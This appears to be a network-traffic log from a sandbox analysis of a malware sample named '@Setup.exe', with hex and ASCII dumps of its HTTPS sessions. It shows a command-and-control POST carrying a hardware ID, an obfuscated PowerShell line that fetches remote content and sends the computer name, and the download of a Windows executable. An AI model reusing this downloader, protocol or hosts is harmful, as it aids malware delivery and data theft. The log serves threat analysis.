                                                                                                                                                                                            2024-12-27 19:23:34 UTC15331OUTData Raw: eb 05 82 c0 26 d3 d4 8a 8d 33 62 59 df 43 5c 93 00 df c6 f2 15 4f 88 cc 01 0a 93 00 b9 99 c0 1e 28 cf d9 e1 27 0f 54 31 8d 5b b1 44 c2 46 2a 08 b7 81 fc ff ed 3d 24 e1 c7 30 76 41 bd a6 25 b9 37 5e 51 6c 14 d8 93 9a 5e 36 42 c1 f3 a3 71 1c a0 f8 a9 18 ec cf 9b 29 ed be f1 e4 30 41 25 20 bd 8b 29 37 9b ad 63 e9 5c 67 6d 84 12 f5 b2 78 1e cd c1 20 d8 4d 59 1b ca 7b a1 10 4d 1f da 02 8b 1e 87 cc 2e 36 48 0a ea ba 9d 7f af 74 c1 6f 5f a4 90 da eb 54 1a e1 3b 2d 33 03 4e e0 f3 85 a0 93 17 55 7f df 61 2b 09 22 99 84 41 74 93 dd e5 3c ce 15 31 6c 66 2b cc 2f f6 7a 3d 09 e0 9b b4 be b3 d9 fd 55 40 b9 a6 12 ab b9 e6 d5 f5 34 d4 ce 65 63 e0 31 ac cc e9 36 83 6e 9d 46 cc ef e5 71 1a 6d 85 a8 fb 30 27 25 cf 93 3a 18 91 5e bc 31 84 e7 11 df 78 44 5d 21 de 87 0e 95 e2
                                                                                                                                                                                            Data Ascii: &3bYC\O('T1[DF*=$0vA%7^Ql^6Bq)0A% )7c\gmx MY{M.6Hto_T;-3NUa+"At<1lf+/z=U@4ec16nFqm0'%:^1xD]!
                                                                                                                                                                                            2024-12-27 19:23:34 UTC15331OUTData Raw: 71 4d 84 f9 9b 5c 92 6c 98 c2 f3 3d 30 40 90 52 a1 26 50 2c d4 2c 1a db 50 77 05 65 a0 8a 5c 5e 1f d2 87 0c 5f 77 97 4e 1c 30 8c 0a df 0b 8e 1b 20 ce 18 17 f1 45 07 dd c3 30 56 47 9a ef 6f 98 24 1a 83 95 94 8b ac 3f 7a 06 fd c7 52 87 66 9e 87 af 40 39 c8 e0 8b 0e c4 ae c4 ed ea 23 77 5f 35 df b2 36 7e c4 b0 e9 08 f2 00 82 90 73 cf 39 bb 02 c5 df 9d 55 4b 83 b5 2a 05 9c d3 03 42 64 5f ce 51 f6 18 0a 84 67 b7 d4 4a 64 5c fe 2f 7e 7f dc b9 e1 23 7d e1 cb 27 ef 0b 16 9d 03 5b 6c e6 05 cf d7 dc 1d 08 a0 04 78 6d 55 ee c1 56 77 5f b0 3f 1f 55 2d aa 5d 2a 00 0e 25 10 d9 90 eb bc b4 89 db 42 a9 fc 36 91 52 59 90 c7 22 fa d5 dd 89 8a 17 4e a9 f0 bd bd 09 3c e7 cb 4c 88 a6 80 b4 65 18 d9 cf 0d 6f a6 d0 37 22 ef 70 4e 42 bc 09 f0 c8 a5 0c 80 fc 4e 10 bf 9b f9 72 79
                                                                                                                                                                                            Data Ascii: qM\l=0@R&P,,Pwe\^_wN0 E0VGo$?zRf@9#w_56~s9UK*Bd_QgJd\/~#}'[lxmUVw_?U-]*%B6RY"N<Leo7"pNBNry
                                                                                                                                                                                            2024-12-27 19:23:34 UTC15331OUTData Raw: 68 c6 a2 78 f2 eb b0 18 28 a9 f1 10 e4 1c c8 15 ae d7 01 5e 6a f5 b3 9c 0b 5b 29 07 11 3a 54 9b 7a 15 30 fa 5b 3d 98 5e 20 b5 be e2 ca 93 f6 d6 ba 0e f3 13 4e 5d f5 87 d1 50 9c 93 c8 6b 6f 9e 50 78 ad 69 8d 47 a9 29 45 45 b2 07 84 eb f9 72 45 70 8a 7e 4a 07 b9 b9 d1 21 8e d0 2b d9 75 d2 ca e7 a5 35 1a 56 2c a9 39 d7 54 e4 b7 9b c4 18 34 d4 55 75 2b a1 be 33 f2 9e 98 c5 5e 11 97 09 3e 54 6b 25 09 4e dc 68 bc b4 e3 2d 30 e7 b8 37 9a ed 08 7d ed 87 cf f7 d7 cf 6c 8e fc e8 d3 93 62 cb 6b 34 d2 66 5a f6 6b 8f 46 c4 c6 a4 31 78 42 a1 78 79 d7 2f f7 2b 57 cb 54 00 cd 55 65 70 7a 09 32 ab 0e b7 cb 51 51 c5 cf 87 b6 af ac f9 8d b6 6d 58 56 b4 ac bd de 74 8b 8b ac 5b 57 3b c8 93 a8 a2 32 d0 b8 11 ef 71 48 24 cd 90 8b da 06 ec 4d f3 34 43 7f 8e 8e 72 db 80 16 04 ff
                                                                                                                                                                                            Data Ascii: hx(^j[):Tz0[=^ N]PkoPxiG)EErEp~J!+u5V,9T4Uu+3^>Tk%Nh-07}lbk4fZkF1xBxy/+WTUepz2QQmXVt[W;2qH$M4Cr
                                                                                                                                                                                            2024-12-27 19:23:34 UTC15331OUTData Raw: 26 06 15 e2 c3 1d c1 ea e2 f1 f8 27 a8 d0 0e a3 e3 31 67 0f 9e a3 2f 16 78 73 b3 c7 e2 e7 89 f5 d1 2e 9f aa 43 95 7e 2b be e8 df 6e bb 8f eb 06 b0 bc 52 b1 36 f0 64 db 2a 3c 88 38 cc b4 e8 56 79 9d 96 23 b1 29 26 3d 1d 52 b2 85 dd da 9b 32 62 b1 37 f3 06 be ac c1 44 66 02 9a 1f be c7 08 5c 74 95 0f d5 77 6e ad 31 f6 c4 88 9c a9 42 e0 bc 54 72 cc a2 78 6b c8 e3 d4 b1 d9 e4 6a 87 03 5e 13 7d 6a 85 e9 05 a2 33 64 a4 f9 24 df f7 22 5f c1 be 18 2f 75 9d ec 5d ca ea 18 55 c0 0b 89 8a 32 d7 e6 53 0b b1 fd fe 99 2e 36 93 02 87 75 9a bd 7d b7 f6 09 25 27 ec cd d3 e1 f2 e9 25 42 46 9e a0 f8 d0 c8 0e 90 b9 70 8e d9 c0 38 74 d9 23 d6 14 cb 9a fa 58 f0 a9 b2 0b 72 4b 09 13 40 8e b0 23 7e c5 3f 21 d2 08 d8 c5 5c 9e a9 81 69 a0 46 25 6c 72 7a 26 a7 19 07 f6 ab b5 db c3
                                                                                                                                                                                            Data Ascii: &'1g/xs.C~+nR6d*<8Vy#)&=R2b7Df\twn1BTrxkj^}j3d$"_/u]U2S.6u}%'%BFp8t#XrK@#~?!\iF%lrz&
                                                                                                                                                                                            2024-12-27 19:23:34 UTC15331OUTData Raw: 99 3d 9e 1d c5 ee ab 43 ea d5 bd f4 15 ad 77 08 2b ab 97 f5 9a ad 4c 39 9a e4 ce 3d 2a c6 7b 85 0f 1f 4e 1b 43 34 05 db ec 33 97 3e 5d fe 37 db 21 7f 47 e9 4a 8b e1 b3 fe bb 55 c6 a5 73 5d fd 7f 5f b9 5b fa ad f6 9f 57 77 ca f6 95 2e 4d ea ee 26 70 7b 5b ff ae e2 fe 19 de 43 d8 58 4a 6b c5 2e be 52 06 3d 69 02 83 14 18 16 11 30 a9 da bc 2e 0a d2 18 60 b1 6e fc f7 21 90 8d 82 99 da 99 5a 38 0b 40 c8 86 50 08 84 38 58 17 87 72 5e 0f a8 fd 3a 8d e4 85 52 70 72 cb ec 83 3d 06 08 5e b8 28 7e 78 3f 21 6b f3 62 7f fa 47 8d ef 3b 45 4c d1 e1 30 fc ac e9 f2 72 77 77 e5 9f 85 ab a2 a9 61 6c c3 1c b3 0f 31 2c 6f ef 0d f7 17 8f 20 52 86 17 fd 10 98 b5 f6 16 06 22 82 d8 16 c9 ed e6 88 bc e5 f5 92 47 cd b7 2f 8b 6a e2 79 29 b6 ff e8 d2 c3 0b 9e f8 b6 7f e0 55 79 a8 4b
                                                                                                                                                                                            Data Ascii: =Cw+L9=*{NC43>]7!GJUs]_[Ww.M&p{[CXJk.R=i0.`n!Z8@P8Xr^:Rpr=^(~x?!kbG;EL0rwwal1,o R"G/jy)UyK
                                                                                                                                                                                            2024-12-27 19:23:34 UTC15331OUTData Raw: 69 c3 b2 3d 59 f1 c9 e1 fd 46 b7 01 d3 91 41 20 ad a8 78 e3 ef 84 a6 6e 31 e2 a5 9d f7 40 f4 0c 2b 75 78 f0 1d b7 0d a5 35 1f 94 ec 2b 51 39 89 7c b4 b0 16 92 71 b4 ca 9f 9d 0c e2 86 18 61 46 ac 82 f8 cd 49 7e 30 c2 b7 4a ba 33 71 74 a3 2f 23 e7 3f d7 f2 bb 8c e0 62 d6 cd bb 06 73 11 f3 4a 77 b8 39 82 83 05 5f 76 a7 fd 30 b9 6f b7 e1 bd 58 da 96 a6 94 d2 1a 5a 53 e1 72 e9 d2 e6 26 9b c5 b9 1f 6f c6 d1 67 1c 9d 5b b6 08 9c 90 82 7b 2d 24 ba 01 35 46 e2 7f c1 63 36 b8 9c f9 98 c0 b2 1c 39 12 c9 99 2d 9f 70 75 19 9c 29 5f ee 5e e1 20 15 15 43 ca d8 2c 94 16 96 36 99 f2 d4 bf 64 41 09 b7 a6 29 10 83 b1 e4 23 f1 59 96 36 11 24 09 59 bf 08 e7 06 90 7a 15 5b 3b 2c 2a dc 7f 2f 28 b4 56 52 8e 10 12 8b be 31 e2 08 32 9a 1b 9c 73 c0 66 68 04 da 75 ad 16 e6 7d c9 b8
                                                                                                                                                                                            Data Ascii: i=YFA xn1@+ux5+Q9|qaFI~0J3qt/#?bsJw9_v0oXZSr&og[{-$5Fc69-pu)_^ C,6dA)#Y6$Yz[;,*/(VR12sfhu}
                                                                                                                                                                                            2024-12-27 19:23:34 UTC15331OUTData Raw: 71 f4 67 b2 f4 a8 ef 80 52 ef 6a b3 ae bf 59 90 87 5f 0f 55 82 b2 5b 9a 47 69 43 e7 a1 1c 1a 12 b4 88 cd ff c9 28 24 97 a1 82 2e 90 dc 48 b0 ca c9 df 33 c7 a5 a9 1f 13 75 46 57 2f ba 25 06 61 ba 82 be d6 30 c1 ca ee 19 9b 7a fb b6 75 c7 53 bf fe d4 d5 fe bd 2d c8 2e 7f 81 47 14 1d 79 33 21 e4 dd 08 ca eb d2 e8 a4 e5 1b 61 70 12 da ab 35 6d f4 59 75 8a 50 c0 c2 b7 0c ca cc c2 2e 4c 8d 13 f9 26 6a 17 ea db 2a 4d 8e b0 ec 4f bd 06 bc 7e 24 ec 8f e0 e7 18 a0 9b 0b 2d a3 18 9c b2 3c b4 0b 5f 7e 82 9a c7 c6 40 3e 95 c8 26 45 57 dd 45 db d1 b3 8d 00 0e 2b b5 8d 14 db 9d b2 8b a7 da 2a 38 5a 82 35 c0 42 bf d6 5f bc 72 d9 4f 3b ba ee f6 10 19 96 6f 80 30 78 bc 90 e2 e5 b7 2a ca f7 1a ec 75 67 76 ad bd 50 15 7a 6c ac 73 3f 2a fd 02 eb 08 52 75 56 03 9f ba 6e 9b b7
                                                                                                                                                                                            Data Ascii: qgRjY_U[GiC($.H3uFW/%a0zuS-.Gy3!ap5mYuP.L&j*MO~$-<_~@>&EWE+*8Z5B_rO;o0x*ugvPzls?*RuVn
                                                                                                                                                                                            2024-12-27 19:23:34 UTC15331OUTData Raw: 9a 78 a1 7c e2 f4 f5 e2 91 7e ff 24 8e 02 a5 34 57 b9 31 c1 c3 30 87 bf 99 cf 2a cb d1 57 61 35 87 91 a0 d6 fe ba a6 3d 74 e0 2a 2b 5f 95 ef 10 d3 ca 3e 3b 68 e5 3c ae 77 3a 45 1d aa fa 46 2e 81 2c 2b 65 30 b3 75 c6 d0 46 f5 14 19 99 e6 d0 46 45 8d f2 5c 33 61 4e ab 9b 76 fe d9 6f 7d 49 a8 36 89 e2 34 19 41 29 c3 bc 12 71 c8 bb 4c ae 0d 93 85 b6 c8 7c aa 14 02 22 76 45 81 84 a3 2c ce ba ff 18 91 dd 17 d3 1e 5a 8a 6b ae 0b c8 7f c5 40 e7 ec 52 2c ff 77 9c 94 fd 51 69 ed 9b 1c ed db f2 e9 01 b6 88 72 04 83 3c ff eb 22 ae 30 d9 8a 59 e3 dd 8f 52 dd d3 1f 52 24 dd a7 3b b5 cc 72 a8 cb 8a b4 af 7d a7 52 4e 60 fd c8 4c 29 2d 3a 4f 6c fa 56 de ad 1c 56 e8 a7 2d d9 ff 4e 98 39 31 bf 1d 90 9c 62 43 71 5f 2d 4e 85 0f fc eb 65 b0 67 f9 43 dd ec 8b d9 c8 f7 d2 8d 5e
                                                                                                                                                                                            Data Ascii: x|~$4W10*Wa5=t*+_>;h<w:EF.,+e0uFFE\3aNvo}I64A)qL|"vE,Zk@R,wQir<"0YRR$;r}RN`L)-:OlVV-N91bCq_-NegC^
                                                                                                                                                                                            2024-12-27 19:23:37 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Fri, 27 Dec 2024 19:23:37 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Set-Cookie: PHPSESSID=68mnkgm096203tn5ds6k5mtjv3; expires=Tue, 22 Apr 2025 13:10:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j2IttjuVHJFlV0Eyt2SVT3SvEyrh2SU1cqm5lTNM4Nm8lPDFNKhNX01X4%2B9VZKFZm8z2%2BcHJ3fkpSep6y8p9lgHvSHccf3OMBTOgMS112P2HdP%2F9Y5WgUnqB7ksiUId1CWGvqJA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8f8baf975ca541ef-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1966&min_rtt=1966&rtt_var=983&sent=344&recv=607&lost=0&retrans=1&sent_bytes=4230&recv_bytes=587773&delivery_rate=181750&cwnd=198&unsent_bytes=0&cid=455b53c92102922c&ts=2581&x=0"


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            8192.168.2.449745172.67.166.494431900C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-12-27 19:23:38 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Length: 113
                                                                                                                                                                                            Host: laborersquei.click
                                                                                                                                                                                            2024-12-27 19:23:38 UTC113OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 44 34 35 32 34 42 42 39 34 32 46 36 45 39 44 34 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37
                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397&hwid=D4524BB942F6E9D4D9AC212D15D33917
                                                                                                                                                                                            2024-12-27 19:23:39 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Fri, 27 Dec 2024 19:23:39 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Set-Cookie: PHPSESSID=6jl13600rn3tas13qhn43qqjh2; expires=Tue, 22 Apr 2025 13:10:18 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oDsta3UdYXS%2BdRSvUkLcx6ezYUdvLNcLyMR5wQVctQ7V8%2BkEb7ag1owWTe%2FJSkjZhnTgMI3WR3Pax10J8vFaaQ9YgY3y22ttj6rlczdmwQO8IhkbmQretoxkF4HYkQqmHjlNpZc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8f8bafb06e867d24-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2028&min_rtt=2026&rtt_var=765&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1016&delivery_rate=1425781&cwnd=193&unsent_bytes=0&cid=7dd3038191dbe03d&ts=795&x=0"
                                                                                                                                                                                            2024-12-27 19:23:39 UTC218INData Raw: 64 34 0d 0a 68 43 6f 75 6f 64 79 7a 66 61 74 6a 37 74 50 59 79 33 61 4f 55 44 36 51 76 53 63 6a 70 79 67 35 51 4b 34 6b 47 77 53 4e 38 59 37 66 55 51 7a 55 2f 6f 6c 66 77 78 65 61 6f 36 76 78 4b 71 45 4d 45 66 50 59 51 46 61 4a 57 31 45 76 33 6e 67 30 50 4c 6a 47 75 72 59 63 48 4a 58 6f 68 53 47 45 45 34 62 39 72 4c 4d 43 72 48 77 63 39 73 6b 46 47 5a 55 45 47 79 57 4d 48 69 70 35 6f 59 71 73 38 51 67 55 67 37 54 48 43 64 73 51 31 49 2f 33 6c 31 6e 6c 50 46 66 67 79 31 4a 4f 7a 6c 74 4d 4b 59 42 58 63 32 76 39 72 61 48 74 52 46 72 2b 76 39 38 4e 39 42 43 47 73 76 61 2f 44 76 70 79 45 72 4c 62 55 77 47 64 47 42 56 69 79 77 59 68 4e 50 43 73 0d 0a
                                                                                                                                                                                            Data Ascii: d4hCouodyzfatj7tPYy3aOUD6QvScjpyg5QK4kGwSN8Y7fUQzU/olfwxeao6vxKqEMEfPYQFaJW1Ev3ng0PLjGurYcHJXohSGEE4b9rLMCrHwc9skFGZUEGyWMHip5oYqs8QgUg7THCdsQ1I/3l1nlPFfgy1JOzltMKYBXc2v9raHtRFr+v98N9BCGsva/DvpyErLbUwGdGBViywYhNPCs
                                                                                                                                                                                            2024-12-27 19:23:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            9192.168.2.449746185.161.251.214431900C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-12-27 19:23:41 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: cegu.shop
                                                                                                                                                                                            2024-12-27 19:23:41 UTC249INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.26.2
                                                                                                                                                                                            Date: Fri, 27 Dec 2024 19:23:41 GMT
                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                            Content-Length: 329
                                                                                                                                                                                            Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            ETag: "676c9e2a-149"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-12-27 19:23:41 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                                                                                            Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            10192.168.2.449747172.67.208.584431900C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-12-27 19:23:43 UTC206OUTGET /int_clp_sha.txt HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: klipvumisui.shop
                                                                                                                                                                                            2024-12-27 19:23:43 UTC902INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Fri, 27 Dec 2024 19:23:43 GMT
                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                            Content-Length: 12191445
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            ETag: "34b63f16f994365a2fc9263e87cd28e8"
                                                                                                                                                                                            Last-Modified: Fri, 27 Dec 2024 11:15:21 GMT
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rTgcWmx5cepMvF1LW8NTKKKgwWtrs8KIbC9AOwJCgIi4x7cdHOB5PGM3ZpF%2FA4C9sFfPpmfR6wswslQS1Jz3iJ%2F2MfokJ7DFckV4Y%2FeW8zfcW9QWfM7HrAILOda30gEVDZuv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8f8bafcc7c6e1875-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1731&min_rtt=1649&rtt_var=783&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2867&recv_bytes=820&delivery_rate=1265164&cwnd=153&unsent_bytes=0&cid=7beac3e7c7c5a188&ts=629&x=0"
                                                                                                                                                                                            2024-12-27 19:23:43 UTC467INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                            Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                                                            2024-12-27 19:23:43 UTC1369INData Raw: 00 00 00 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 60 0b 00 00 02
                                                                                                                                                                                            Data Ascii: R\`.textVX `.itextdp\ `.data88:x@.bssXr.idataP@.didata`
                                                                                                                                                                                            2024-12-27 19:23:43 UTC1369INData Raw: 01 07 48 52 45 53 55 4c 54 04 00 00 00 80 ff ff ff 7f 02 00 44 13 40 00 0e 05 54 47 55 49 44 10 00 00 00 00 00 00 00 00 04 00 00 00 e4 10 40 00 00 00 00 00 02 02 44 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 06 00 0b 40 76 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 28 9c 4a 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 28 9c 4a 00 06 43 72 65 61 74 65 00 00 40 13 40 00 02 02 00 00 00 00 04
                                                                                                                                                                                            Data Ascii: HRESULTD@TGUID@D1@D2@D3D4@v@&op_Equality@@@Left@@Right(J&op_Inequality@@@Left@@Right(JEmpty@@(JCreate@@
                                                                                                                                                                                            2024-12-27 19:23:43 UTC1369INData Raw: 00 fe ff 72 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 7d 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 7d 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 44 69 73 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 7d 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 94 7e 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 43 6c 61
                                                                                                                                                                                            Data Ascii: r@MTObject&}@Create@Self$}@Free@Self)(JDisposeOf@Self>}@InitInstance@Self@Instance/~@CleanupInstance@Self)(JCla
